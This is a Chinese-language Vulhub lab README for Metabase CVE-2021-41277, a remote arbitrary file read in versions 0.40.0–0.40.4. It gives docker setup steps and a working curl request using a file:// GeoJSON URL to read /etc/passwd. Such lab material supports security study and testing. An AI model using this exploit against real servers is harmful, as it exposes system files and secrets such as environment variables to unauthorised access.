Files
vulhub/metabase/CVE-2021-41277/README.zh-cn.md
Aaron 63285f61aa
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
first commit
2025-09-06 16:08:15 +08:00

33 lines
972 B
Markdown
Raw Permalink Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Metabase任意文件读取漏洞CVE-2021-41277
Metabase是一个开源的数据分析平台。在其0.40.0到0.40.4版本中GeoJSON URL验证功能存在远程文件读取漏洞未授权的攻击者可以利用这个漏洞读取服务器上的任意文件包括环境变量等。
参考链接:
- <https://github.com/metabase/metabase/security/advisories/GHSA-w73v-6p7p-fpfr>
- <https://github.com/tahtaciburak/CVE-2021-41277>
## 环境搭建
执行如下命令启动一个Metabase 0.40.4版本服务器:
```
docker compose up -d
```
服务启动后,访问`http://your-ip:3000`可以查看到Metabase的安装引导页面我们填写初始账号密码并且跳过后续的数据库填写的步骤即可完成安装
![](1.png)
## 漏洞复现
只需要使用CURL即可简单地复现这个漏洞
```
curl -v http://your-ip:3000/api/geojson?url=file:////etc/passwd
```
可见,`/etc/passwd`已经被成功读取:
![](2.png)